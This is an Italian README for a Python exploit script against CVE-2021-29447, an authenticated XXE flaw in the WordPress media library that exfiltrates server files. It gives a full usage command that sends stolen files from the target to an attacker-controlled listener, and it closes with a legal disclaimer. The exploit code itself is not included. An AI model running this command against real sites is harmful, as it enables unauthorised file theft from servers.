
Sfrutta l'iniezione di entità esterne XML (XXE) nella libreria multimediale di WordPress per esfiltrare file.
Exploit dell'iniezione di entità esterne (XXE) autenticata XML nella libreria multimediale di WordPress per esfiltrare file.
Corretto in WordPress 5.7.1.
Richiede credenziali WordPress valide per interagire con la libreria multimediale.
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
Lo script chiederà il percorso del file e restituirà il file richiesto.
Ispirato allo script di David Utón (M3n0sD0n4ld) ExploitDB.
L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma. Utilizzare solo a scopo educativo.
Questo script è rilasciato sotto la Licenza MIT.